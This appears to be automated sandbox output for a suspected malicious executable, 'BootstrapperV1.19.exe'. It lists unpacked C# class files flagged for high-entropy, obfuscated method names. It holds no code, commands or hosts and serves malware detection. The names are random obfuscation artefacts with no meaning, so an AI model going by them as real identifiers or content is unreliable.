Source: 0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpack, sgLoBqGshEXy1Bx3cN7.cs	High entropy of concatenated method names: 'l29', 'P9X', 'vmethod_0', 'SsadJPFdr5t', 'hVJG3q8Gjw', 'imethod_0', 'xWfXlTdTA7PIgH4SjcLq', 'QDcaTrdTKaunC9s3pYiK', 'El1RvydTOWAH7r0tidBN', 'UEEEtfdTB5eyUrHAwpnl'
Source: 0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpack, zpB7r3YxvuslBboFAc8.cs	High entropy of concatenated method names: 'OCJTiv9xyD', 'diUTdhO81g', 'Yd7', 'ndwTwZH6n1', 'iTGT2vc48L', 'mdCTJUAXps', 'O7aTGBIYxa', 'Neu9pidrdLn5dd9voMGs', 'AJ8V8qdWzPrKb8TtGZai', 'LQkjmvdriliDl049AgLb'
Source: 0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpack, eP5Gv2cHImrxAnL3beH.cs	High entropy of concatenated method names: 'CZxcTJlFY1', 'IboL1ud0ExiHTkZfMfay', 'riwKxRd0VCXfLg9P9Qxl', 'VwwuFKd05DoVWbrJ2mYD', 'lJQifxd09c8c3THJcsyC', 'b9B97Jd0APVVYbVTTcIv', 'E94', 'P9X', 'vmethod_0', 'JNIdJjKHMW8'
Source: 0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpack, eZAYLEG63BEuMY8eQfC.cs	High entropy of concatenated method names: 'l6uGgbYjsy', 'is2G7o7USQ', 'Ld7GZpvV9l', 'vHZvxEdT59W2tCQ8lqfY', 'gjXdN7dTEoS2ewTg0LFs', 'CIgbKidTCj9E0sLS0K0J', 'jSuTjZdTVqbyODnImhlO', 'HJnGeKTyC1', 'HiTGHomcfl', 'AJ0XA6dT31RP2sFKPokZ'
Source: 0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpack, K3vnDkkRZna5ntOkLOT.cs	High entropy of concatenated method names: 'Xkpk7IZlEw', 'IryYl9d4EFaCidN1ppfs', 'L4xLcnd49VAqwKb75IrJ', 'kHw34Wd4VeM6X8TptOEG', 'AtHAWVd45RGxwiH90bdK', 'dpmgJXd4AeKJRGyErOq2', 'U4fUr0d4KmfS4NXTICJk', 'M8BkyCjQYw', 'VpKkISVVaD', 'fiNkpYqtgc'
Source: 0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpack, SiHSKVFplvOFL7lSn7L.cs	High entropy of concatenated method names: 'RgpRvo39yP', 'QtTRhbLFlr', 'C4Wpv1dVD3PRr5yMO6TA', 'FND8uKdVoLElyRHeVNn7', 'LoqhRxdV1G9GdhcNswIB', 'PY2xY6dVLayQwYwEG0bl', 'C25XcfdVNikpGwq3Pyff', 'dIWRREhF3T', 'lgTXM0dVxPgjOFKZrbmw', 'FeVhaodVQQNmHeN4ixa0'
Source: 0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpack, Iyf8nVlIVwjNu2TmlXo.cs	High entropy of concatenated method names: 'gGIlesATqH', 'PH1rfCdsVsfj5F5tRdBp', 'mEGcE8ds5G0PWjrYKshH', 'oMEBBhdsERlTag97Se0C', 'F4OFCYds9nFZEeSGwb2m', 'yPhNApdsAFCQu3NWQbSf', 'ocqO7Wdsmjxx9SKnVT90', 'S0GpLLdsCycKp5wrRkaM', 'wJoZUjdsKPvnGQUJBmS6'
Source: 0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpack, XZnPSqdhCwxGeOaoYyA.cs	High entropy of concatenated method names: 'NuGd6UVgKD', 'zoFdbW5Nks', 'D2gdtTcvlG', 'tkb9dwdgu0M3P8FPtu7D', 'rJPMAYdgR16AbGC22qEe', 'wuWBX5dgjSCXD9V5vAsc', 'Ns2gcrdgyHNHLIxHIo9j', 'a473SUdgI8KA3DbBZx3S'
Source: 0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpack, wUwAQUGoZtL37YjvxI3.cs	High entropy of concatenated method names: 'e93GQOl3pd', 'YEfGaIJk6B', 'PbPGxu34lh', 'HI6GzDCC2Q', 'R4gciQJo4Q', 'EhScdegriD', 'feHcwTLGES', 'FREhSod06ALPoNJZmsrT', 'zBChvkd0bjNf2Per2FuM', 'siP5a1d0hsliDjG4TA1P'
Source: 0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpack, ByL6IQVXXZrh0SceR8N.cs	High entropy of concatenated method names: 'IH4Va7EDwy', 'wCxVxC7wsj', 'MBpVzCjth6', 'VEv5iHJUwP', 'NJq5dmATvi', 'WcS5wHSc6m', 'Ngw52OBmPO', 'g7O5JEHSrw', 'gSl5GLncfZ', 'uh25cc8wSj'
Source: 0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpack, pEpn0Uydwuhg28FHsex.cs	High entropy of concatenated method names: 'rC9', 'method_0', 'oUDdlR3B7db', 'geLdlj3uASA', 'yTLPOndEOpow0M6lSsVC', 'fAqiHedEBAagGMZdH7RW', 'jr6wvkdEUKJRivyYwj3J', 'oSshgddEW9oaLF5paVgU', 'BhIPRsdErx3NK2LY2ncW', 'TL57P6dEoqRJfUUJtms1'
Source: 0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpack, orrItn7OSYL3BKHpDGE.cs	High entropy of concatenated method names: 'akM7UgEIIF', 'rwm7WFDu03', 'VhV7rNKsDX', 'tQx7yjdBBEgu4k2eMm0q', 'fC8x8hdBKGqyfuOHXUUH', 'xt2TuYdBOgXiHUJt8sZI', 'bsgIYRdBUVC7oITpQ1tJ', 'c39EixdBW0d8DdRbUWnx', 'MdIao8dBr7pftZ5dq2uv', 'e4VDGTdBo3CdDM8b3xGt'
Source: 0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpack, FYX4aOlGSdRD5CQq1v7.cs	High entropy of concatenated method names: 'O3I', 'P9X', 'C61dJSpTZUK', 'vmethod_0', 'imethod_0', 't6ZXqydsF124HgiQFa0x', 'XNXRrGdsvmU8Oi53cOt2', 'VnKuRxdsh1o30f94APJr', 'JoTnQPds6dvShYEAd9kf', 'YQskXKdsb4SrgvwvBa5Y'
Source: 0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpack, aydgOIZ5uyteP8hL0rI.cs	High entropy of concatenated method names: 'DeCZ91ePSp', 'ymbZAbfiGu', 'kAGZK22Cf5', 'uYYZOPF4GK', 'd8sZBYpTbh', 'oSKZUBVjf7', 'JmaZWSE7B2', 'sAVZrbOGiE', 'u5qZogqE1l', 'uISZ15FqsL'
Source: 0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpack, EfXDmijhlMXXi1yjthp.cs	High entropy of concatenated method names: 'pAJjjivhCs', 'FgKeV3d5xWA4OU3nKlsI', 'm9Ac6wd5zU8Mp5kveJKH', 'RxWQEAd5QYtx3V5kBmGH', 'dwtq9rd5aDw6dXn84Wpv', 'fyY8ajdEi2ZWCxIq9fIH', 'CVMj6UYp9Z', 'Se2rH8d5oM4AdGC5mNq8', 'cdHVdAd51nYPcnlBTH02', 'OOZOSFd5Dk6x7Pvrkdsy'
Source: 0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpack, loak9tDTx8UxwNx0SXy.cs	High entropy of concatenated method names: 'method_0', 'h59', 'R73', 'MrbD4rjaBC', 'W1BqZbdNDJjOR88mGVQV', 'DQIIXjdNLJL0Ko7qwjab', 'NTdKtPdNN8Geuahw8vtM', 'QXrUrPdNXM0uLAX0tgVS', 'jApUCLdNQLlgbXg5LdoJ', 'T2861ZdNaAsZhN56VnpW'
Source: 0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpack, yV4CUEeoo52WkeWC1ZZ.cs	High entropy of concatenated method names: 'uuXeDMOVIU', 'uVoeLgHtaQ', 'sGmeNW655E', 'fyPeXavRIR', 'JIGeQ01Owk', 'RKpv58dANDtwPc6QkTR1', 'msRAsXdAXny0CueOdN3C', 'JUUjkWdAQ2kdCl2yTBl6', 'XcROWRdAavJLM4v6ZE3H', 'VUI8YWdAxqhC48bnXneK'
Source: 0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpack, eTPltgCT8NS7aqQrvfj.cs	High entropy of concatenated method names: 'NlrC4k7Yin', 'ABaCsapj7L', 'PObCnSpy0F', 'ypoC3xgL6J', 'zteCmbm91o', 'fHZCC8tJ3C', 'yV3CVvMJSM', 'gcjC57N3hx', 'kOPCEL2pnN', 'bslC9ysoEj'
Source: 0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpack, EbEKDRZTNxx4QvphlqR.cs	High entropy of concatenated method names: 'DB4', 'method_0', 'method_1', 'method_2', 'method_3', 'method_4', 'method_5', 'A47', 'fC4', 'aK3'
Source: 0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpack, NyHUmVjA6wwfYZYxlpK.cs	High entropy of concatenated method names: 'TagjO4edcT', 'Lc8jBJmKTe', 'abljUk95ur', 'jjYBDqdESBQOD9YODiWX', 'FG5T7jdEekZas5JLIXMC', 'xanyiOdEHLGabC255Tgq', 'sZhpiAdE8dqPeTMOY8PV', 'sUmLjndEgqZK6oAK7piU', 'TkXUBMdE7MwmbWtvk1xi'
Source: 0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpack, hR3CLFzffFD3QIInCq.cs	High entropy of concatenated method names: 'j8XddAqBwe', 'NNud2I7Vhq', 'a25dJy7S94', 'DlldGGVCGl', 'FjwdcrPLG3', 'OdndkKNB7O', 'gHudMN9oLn', 'bZ7dgmdgMDVmLcI5lA2C', 'lrONiKdgfrIka86ZRZjF', 'xA7PZjdgPrx7hpCcHwgU'
Source: 0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpack, FEaxvtRDwjTdbLI3Wqn.cs	High entropy of concatenated method names: 'm1I', 'G4q', 'w29', 'jRBdlvGUv4y', 'MNtdJONXRvO', 'F3Puued5ZkHYeNFirym9', 'x8imbpd5YPMtRksKgYqp', 'lON3vmd5TqnPlvH6yVSK', 'Mwb6VOd50P8D7o7OFvNl', 'fM8EGed54XSd1VpKkGxf'
Source: 0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpack, jf1scMRCdWpEXADMYhS.cs	High entropy of concatenated method names: 'EaKROkdaRI', 'ImuRBeNqsa', 'GstRU55txo', 'vV6VfDd5yi4L07AxEf4g', 'jZPLyjd5R1EdNVEZUPki', 'oIwVGMd5jkiTiCy7E8gi', 'T0yR5h7Qay', 'OuoRE2rf3V', 'KraR9Ax2iu', 'xci2YNd5bYGRcEs44eAE'
Source: 0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpack, Er4GOj2rNOLEknahGv8.cs	High entropy of concatenated method names: 'nD2J2hHck3', 'Fm6JJ4pMUU', 'akFJGO3bgX', 'vqw1lVdYMSx1DqTom8jV', 'kG4AbxdYkfM3aoVGjvBG', 'RjWfHldYl8NryPq9N3wx', 'lsbvwJdYfCuK36aQApp3', 'pS3JPbQrj4', 'wP1MhpdYqeF0w4QLs7CR', 'ESG1CidYvnsAvy0BrYDy'
Source: 0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpack, YyUFRcgEUIxexsDWZSj.cs	High entropy of concatenated method names: 'YWOgaeB02B', 'fd3gzbnG1a', 'rTBgA1OriZ', 'dM0gKlBkuV', 'FklgOeLJW6', 's2HgBs6Qru', 'lPDgUc64vp', 'c05gWUEvGW', 'MDDgrBwwAd', 'Xj7go5mkYv'
Source: 0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpack, zFEf6YkE0TMRWDU97ss.cs	High entropy of concatenated method names: 'RkkkNahRtT', 'n6YkXihCyN', 'I4dT1adskIwsw7splHZo', 'TLGVNKdsGGNARB7UHt5I', 'cFtecMdscw06DGFVn0Tu', 'QLVNWDdsljfR67fbcOhp', 'KEukAivcw4', 'oaykKNWZIO', 'SEJkOOB0Vw', 'LUfkBZuoIn'
Source: 0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpack, JT62JOjWc9uMeTVf07m.cs	High entropy of concatenated method names: 'NUJdlbuN9Ol', 'g1LjoXTdWb', 'iJAdltt4V6i', 'uQmD59dE0JOYe5nlDnwf', 'yKIaIBdE4FhkB1ZXxguW', 'vh84uAdEYChIpaqpu0S7', 'yWSXDTdETBop7CNW86N2', 'I30UsudEsRYGs87c47es', 'JqQapUdEnQXYRMvX87c9', 'NhR2QNdE3qsGWUX4YntC'
Source: 0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpack, khav98MeJKByOr3MWtX.cs	High entropy of concatenated method names: 'I6wCMXdmBXdLZ6KUWbMr', 'MXM7VrdmKynWY7wFrPBQ', 'SKeWPtdmOmbFwfWJtcSn', 'sRWme0dmUNqmilT425WL', 'unJhxRaXOg', 'R4raj5dmrhZZid09LnZb', 'PasrtNdmoU5AdWWXyvUj', 'CUWboXdm1m2UkZxrIxDq', 'xk4FdKQf2h', 'AblsWPdmXQqD6UO8yIis'
Source: 0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpack, ay5DJ3TQEZmnX7x8PQF.cs	High entropy of concatenated method names: 'Jw5TxqoA5D', 'JrPTzuXyIM', 'aU60ifqfWt', 'Pjy0doo0x4', 'jcn0wd53CT', 'aRN02JT2XA', 'Rpx', 'method_4', 'f6W', 'uL1'
Source: 0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpack, t50OvVlOQ3yDHAC6JcS.cs	High entropy of concatenated method names: 'mYYlNT7xEb', 'Yp7cl8dnqDLibJh4GcGC', 'JMMAMYdnvwS6eTQ7ONmg', 'F0btoSdnh7fJQUC1LKs5', 'P9X', 'vmethod_0', 'zU6dJgZsu3f', 'imethod_0', 'Gw03ZXdnMAI3n6nMHS6s', 'RnH8VndnkYT7DwMjILYw'
Source: 0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpack, v9AUSXkdhdt4QKnuNxW.cs	High entropy of concatenated method names: 'juLk24pjcu', 'X9ukJuxVqo', 'pGEkGTu7TQ', 'p9hGELd4fdn1ueFmgy0R', 'AyrCs3d4lEyHVAURdbFh', 'KaSQemd4MuuAIDq53QQg', 'N7di5wd4PYZt3vNeKg0k', 'LoHpS1d4qlbZtLbwdDP9', 'QKVVjfd4vbfoqal32Spw', 'CixjSYd4hJxPJLMMXtZj'
Source: 0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpack, OP96RIg2EGMkavblGoy.cs	High entropy of concatenated method names: 'method_0', 'YU8', 'method_1', 'method_2', 'WStgGQPXSt', 'Write', 'DcegcG9vBQ', 'QUIgkps8mR', 'Flush', 'vl7'
Source: 0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpack, OjHp06GMW9cD1ZIZXtx.cs	High entropy of concatenated method names: 'Rpx', 'KZ3', 'imethod_0', 'vmethod_0', 'UqhdlGufL3w', 'RdIdJdHUcs6', 'jsV8EldTjg10p1tGoUlF', 'EgAcLFdTylfE3nukL8Dt', 'qVQcGydTISJwtes0Yq4d', 'IqnvyFdTp73BSQNJ3UOK'
Source: 0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpack, FcGsnWyPsZc89kjZ0T2.cs	High entropy of concatenated method names: 'Rrr', 'y1x', 'pTwdlIFkwTZ', 'aXZdlpMcTr3', 'ogxldmdEzFameoZ0YAac', 'zonkAcd9i19ixTw9A5bH', 'EHaFItd9dLELtgto9P0T', 'Ms9uxUd9wDDO0AMPLfjw', 'kRNPIMd92nHkCXHMvXkm', 'Wy3BQFd9JqpEjWYZMcV7'
Source: 0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpack, vFKDAHNTFQP6MkldX87.cs	High entropy of concatenated method names: 'EYiN4Mgygt', 'pjoNsANVVL', 'rLJNn9mJxu', 'GyXN3rjedZ', 'Dispose', 'vpP0xFdQYDCOmjUvhRx1', 'gc7YAsdQ7c3Guaqe2TKU', 'OUspJPdQZ2FccvTQQnYm', 'biyXifdQTdBPMBUM6GRa', 'rMt7l2dQ0nV9LJU7LQgh'
Source: 0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpack, EeaICIlf9e3B4G7DvJ9.cs	High entropy of concatenated method names: 'giWlqY9YZM', 'Xo8lvulIOm', 'rHLlhbr7o9', 'bFeY4fdsyYlnFJaZ5gFR', 'YTEoPadsRKk47lS2h6Ip', 'IHDEGOdsjrAuc7JFsdgF', 'PUsgfjdsIoQHih72tNCj', 'yYYCwLdspywDvkU6SWFN', 'uHOxx5dse5AYgykAyh4Q', 'Tc0xNSdsHR8UqE6IX2q8'
Source: 0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpack, jkZxXcdu6Iht96a3jQm.cs	High entropy of concatenated method names: 'RTM', 'KZ3', 'H7p', 'eeS', 'imethod_0', 'XbG', 'fO3dkz9xsvJ', 'RdIdJdHUcs6', 'GL4TrldgeZUaDRow22mw', 'snj3EodgHtXbybSeEtXT'
Source: 0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpack, qbPQRhMwJitwKnXPc4e.cs	High entropy of concatenated method names: 've9MJqcPeO', 'GZXMGeOmhx', 'xvKMcBblgA', 'REhMkBXhaG', 'UFBMl62TdN', 'L0RMM4qrKo', 'PZPMfYXNvb', 'on0MPTC3T6', 'MMEMqHyabt', 'zFIMvE8sOP'
Source: 0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpack, GMK2LDcEY7p5xj7C0g1.cs	High entropy of concatenated method names: 'lQAcNVPr6s', 'bZpcX4Ewg9', 'gSJcQYih9X', 'lG4ELad4G3QTcA3edVqN', 'kV7mORd4cyTKifXB6fqw', 'OqomQnd42Jauw8MbpaJQ', 'pGNBhnd4J717D01jQtcl', 'p3vcAsnCi2', 'WdscKOG6hw', 'no0cOZmwXu'
Source: 0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpack, H7jhjHNv8pAZEB7ciLL.cs	High entropy of concatenated method names: 'HbjN6cZn4s', 'X62NR53r8v', 'm1aNIBt8bC', 'eUVNpCXgVb', 'lVBNeSGZDa', 'VIJNHCcuat', 'cQENS3uTYZ', 'QqwN8y6DZX', 'Dispose', 'ahnkIBdQIAVEVg5qbDgE'
Source: 0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpack, XBuOgyl5H5jbr8ZX7y8.cs	High entropy of concatenated method names: 'P9X', 'Yf5dlqpRwvl', 'imethod_0', 'qeKl9qXkLR', 'plAt6Mdnd0P742N1AkJG', 'E18aaSdnwG3tEXGaFZMp', 'ufbiLpdn29wOnUwpTHgN', 'bsI2KAdnJyp7kxT2rVKO', 'M6lYVfdnGXIyD1KOmahv'
Source: 0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpack, PLEunsaVTgxTC7esIAM.cs	High entropy of concatenated method names: 'EQCdc0CZhit', 'GMFdc4autED', 'VwZdcswxW2X', 'rFndcnpbOQS', 'nYfdc3ZFgFQ', 'JHidcm0SSUh', 'ooKdcC5ogBY', 'dr5xGyNpMx', 'ntjdcVI0bdG', 'whidc57Nr00'
Source: 0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpack, UK3l9KMhXcMyaS2MeSI.cs	High entropy of concatenated method names: 'q76', 'method_0', 'p9e', 'hkB', 'method_1', 'method_2', 'YTSmdidnCmfvLkpU0Eig', 'L9pB5cdnVnGw0qFIMRSg', 'TrYPEAdn5t9kiPiCsfL6', 'QFeM6jHPof'
Source: 0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpack, V66tPwIvgKLx6WLHXAJ.cs	High entropy of concatenated method names: 'g7HedS2753', 'N17hkSdATAHedBxyhPTx', 'WyGssRdAZfqO12OvXmfu', 'QEGmp4dAYmwAOdTiE0Hm', 'gsdDSRdA0rbPbrEeh03h', 'F8hIFRVv3d', 'fcnI6ivofo', 'R2mIbrH0si', 'lJqIt84lbW', 'cW7IuPxp06'
Source: 0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpack, zX9bkRJVRjNjNGQ8QxI.cs	High entropy of concatenated method names: 'SWpJaKIxCj', 'LiesgndTkxE4o2gZLHqQ', 'p2nFCgdTlalwG2pxXyNr', 'Fj0fT7dTGZcPYfNsipYP', 'BfBdmJdTcbBl5PB5HSs8', 'IAxk9udTqoelGMC16YTB', 'KILVvedTfSaaD5jqjUgB', 'YGIAewdTPmjH4jHYcCdx', 'VNys4qdTvqjnLMTkPZWb', 'vIDGcd3JgV'
Source: 0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpack, nmHayoR7JAXjUvgvraw.cs	High entropy of concatenated method names: 's8bR3NyY5C', 'WFYUymd5hLRV5ft1t28p', 'MD5ssid5qCEI4D6A20g7', 'AlqunJd5v0NBgq8O6Q0I', 'F3GwWXd5Fni4vRSH3fer', 'mRARYZaeXk', 'yXwRTYQa4W', 'eWKR0XWfHE', 'E7HTlTd5lI4lItxeXH7v', 'bvL3ncd5MCT644nJ0l2p'
Source: 0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpack, i2xKQZy6LWXBs45htlM.cs	High entropy of concatenated method names: 'h3GYYqd9Iw0GtQ8ajRM4', 'LvK723d9pDEvLPnseali', 'VIOmXRd9eMMxo6eJRqwS', 'mnLhN3d9jrfK5JCJYVeh', 'vvNyBed9yl3LOi5coCB3', 'method_0', 'method_1', 'indytMkwCD', 'yP4yuZYQE4', 'BSRyRakilt'
Source: 0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpack, VegtO5jCdOgBIJmSpaq.cs	High entropy of concatenated method names: 'N2N', 'TwQdlFktXqi', 'dKNj58Tu94', 'cKbdl6DrDEJ', 'OKltWfdEjfQMgR94qNoy', 'HlmwpldEutYBZWRRMCpf', 'S3nE91dERqdRUM09mZJL', 'bBM1IpdEyxB0tKC3l5Is', 'OhOPikdEILGDUcaD2NKg'
Source: 0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpack, xGLaw6lgGrNw7bllSAg.cs	High entropy of concatenated method names: 'NfxlZQpUCq', 'Yx2lYdMcNV', 'QirlTSep4J', 'UrOl0Un0a3', 'amEl4p0pLL', 'EBplstJqbO', 'pWpU7yds1EjK0KIW6FPI', 'XMECJXdsD1ZIA68OFH8A', 'S6yeqndsLX98GoGKUms8', 'kFFM44dsN4OQe3XDcqjp'
Source: 0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpack, mjhLR2CMZWkQO0T3JbG.cs	High entropy of concatenated method names: 'CJiCHuEGdB', 'r3TJUddDSZlU6dDX92it', 'd6UGIidD8F5Wc4O6Ujsk', 'XTP28RdDeaR33GKpv5Vn', 'pajHaIdDHb3qYrj24ctv', 'IPy', 'method_0', 'method_1', 'method_2', 'vmethod_0'
Source: 0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpack, JlDk22auikPg5UGbLQT.cs	High entropy of concatenated method names: 'lVsaZ78Onw', 'iqqaYtxujf', 'eWjaTOOUbU', 'Hiqa0XSTqL', 'FmAa4Xqkfn', 'DSyasJksAg', 'EvEanbAD71', 'eq6a3kjpxg', 'ILhamX7Qk8', 'GbQaC4s5C4'
Source: 0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpack, B2NvOMXtqVYtZCRbgnc.cs	High entropy of concatenated method names: 'iwM0ygdaRZjMDwfTIMQD', 'Ooh15mdajp7V070IkIh5', 'OihQDQMfs5', 'vEfVOydaeB9gu5sj3rYh', 'eMJU00daHV1Jc3QgrGvM', 'HmhNWfdaST87w49vU2Co', 'XWsbPpda8ww1tShwSIg2', 'xYEYJBdagVtrdJ0I5osS', 'deOJD4da7TGCTmPBHFVp', 'fvRgV9daZHCnj90AeSJO'
Source: 0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpack, QQBOQAsmMbpqfSQE3Kc.cs	High entropy of concatenated method names: 'q13', 'Sw1', 'method_0', 'pOosVfuC5e', 'L0Qs52dQqQ', 'SKHsEsArDe', 'Y6cs95D3O6', 'PXJsAMrUfW', 'ErksKjkIKV', 'pngBUFdoQXWXWZOyvsq2'
Source: 0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpack, m6xtDbHAmLO2y9IER4J.cs	High entropy of concatenated method names: 'a99', 'yzL', 'method_0', 'method_1', 'x77', 'GrsHOmT8pb', 'gpOHBfviuN', 'Dispose', 'D31', 'wNK'
Source: 0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpack, doLl3eVTPcF7rnjVMeV.cs	High entropy of concatenated method names: 'gTSV4xOl5F', 'M8WVsvwxWg', 'n4rVn0N3Ik', 'AywV32nwhm', 't5EVm3w8ce', 'RFXVCxla9w', 'LKMVVeRiTk', 'QBmV5AJpSs', 'bfaVEEyvfI', 'BhpV9axX35'
Source: 0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpack, EalZ7BlbUO2J6AS5b4Z.cs	High entropy of concatenated method names: 'NYjljaWZmc', 'NAQrt6ds4iqFqDhHvH8x', 'z6Cm2hdss9ZneKM4EcYb', 'eAFlhMdsnO6jvLZCIl28', 'AdMlueSPnr', 'eJ1swNdsZjOZ4IdmFNne', 'M33eJQdsYVX1wfs7DsGc', 'tbs51CdsTMo5DVyVkRBU', 'vnHH64dsggIuAfp5rVIy', 'Rg5ynTds7YNGEc2g0KmN'
Source: 0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpack, U4KgmN7xttD1DJcM8UX.cs	High entropy of concatenated method names: 'dmiZiVYSRr', 'SjFZdZHsEI', 'JrbZwVd7wn', 'akxZ2Cfc0v', 'BtnZJdx7na', 'fk7ZGAMZc1', 'qDwMiOdUwOl9euexLq5d', 'Gp2mFpdUic8k22v2nydN', 'sesDZXdUdZ9cDQ6Du5H7', 'fc2019dU2ByDB920Q4yg'
Source: 0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpack, BrafOi0ya2QydcUhBab.cs	High entropy of concatenated method names: 'lFO4hLEqc8', 'RVvEpHdraC8187wOxDOb', 'R4vb8ldrXCL2jtiDPNoL', 'Ri580OdrQ77tk5iFUlac', 'eyTRvGdrxvG8l5NthW4D', 'kt5', 'aMo0pTeowV', 'ReadByte', 'get_CanRead', 'get_CanSeek'
Source: 0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpack, qaWcFq4n4HNWO8L1XHI.cs	High entropy of concatenated method names: 'Close', 'qL6', 'Nf54mQ4Svt', 'kph4CAdQxW', 'zjD4VWObcE', 'Write', 'get_CanRead', 'get_CanSeek', 'get_CanWrite', 'get_Length'
Source: 0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpack, yySYoC3nd1ijaqoEl2D.cs	High entropy of concatenated method names: 'Dispose', 'MoveNext', 'get_Current', 'Reset', 'get_Current', 'GetEnumerator', 'GetEnumerator', 'tQVwCtd1ED0dq5J9yjjg', 'zJoWl2d1VgGaQM8Njur6', 'Oacqdid15Lxrb54wBNXL'
Source: 0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpack, yLIb7h4rWHmVLUXo7uJ.cs	High entropy of concatenated method names: 'mA441i5XN9', 'k6r', 'ueK', 'QH3', 'UrO4DS22NO', 'Flush', 'xiE4La825r', 'CUh4NP3sod', 'Write', 'yQP4XAtlMQ'
Source: 0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpack, MIvnTjwTLZARjr44QSO.cs	High entropy of concatenated method names: 'sxCwEGIYqX', 'aA4w9RBBvv', 'VTnojrd7E2DmhTnarguc', 'dDt7k5d7V0PvQcCRxKU4', 'iTEPeDd75jFy2avnO08G', 'iSUwB98pHY', 'V2627Sd7OqvY71xTZbSb', 'PELVkyd7AQ741fsReymY', 'NrGxJ1d7KQjxOVFR1jBH', 'RhsHY8d7B6pSlRjtAqmH'
Source: 0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpack, PfNvPu8Tb89hDJp81qR.cs	High entropy of concatenated method names: 'method_0', 'xGy84J6693', 'kGa8suN0bX', 'uQ88nRqIP2', 'Yjd83KPIWs', 'D1b8mPPAby', 'Ktf8CwVvOu', 'D5B0C8dO7wGNZEOYKFnZ', 'DNEXjEdO85pIPEgmrLh3', 'ubtqjHdOgS47G6qyGPKP'
Source: 0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpack, s2aXaH8P2WkOyOTibFy.cs	High entropy of concatenated method names: 'J168vxjr7R', 'Lsx8hbTQ4E', 'wjq8F9iSb4', 'rCu86bPoqH', 'll08bMbN8F', 'M0NMcKdOtxyg8OLpLnCZ', 'JqQtuOdO6rST6L8FhOTi', 'HSZFrTdOb7dJr1d444ul', 'p3R2TcdOunJK7vCk7vFB', 'wBW0TmdOR6WKsyroxDur'
Source: 0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpack, Ta0XuJXiMFlHqPlBFM8.cs	High entropy of concatenated method names: 'YDxXJ69STs', 'yoNXG60Oku', 'EnqJrfdQzGrSZYhflsgV', 'BZwoCvdaih1g5Z0BDTHW', 'xqfZWgdQaqBPRL44tVeE', 'zEu9BsdQxaKYSSvKnrvg', 'vg99vqdadcksWd9gELEx', 'EB3ZWFdawJ7vMEAQE6P3', 'X7VXwDTV6F', 'vsjIxSdQLsEU2AtYAWsr'
Source: 0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpack, EdrHUOdD3767aAtplnG.cs	High entropy of concatenated method names: 'P9X', 'K8PdNSUFoP', 'stqdliXCtro', 'imethod_0', 'q5KdXM501E', 'HuIBqqdgNXaV0YQU2y6w', 'd5oQjjdgX7VCdD7mN6wb', 'LD3nBMdgDrRPgTuKyFYL', 'EfO9vKdgLBmnW8kU1MWE', 'n5yDdtdgQ7UHjtfvvude'
Source: 0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpack, zUlUd628L9Le5To4ZdW.cs	High entropy of concatenated method names: 'Bw329v1Gcp', 'zTv2A4cDlk', 'GnY2KOdSqJ', 'OiM2FSdZUGUeVX0vGGFn', 'UgosVidZWWuGDEAH6MTD', 'LYJE1LdZORJMerOGGGK4', 'hQipHtdZBejjjwbq2C80', 'awV27yYpmp', 'QvX2ZGrfeX', 'lWb2YnGtLL'
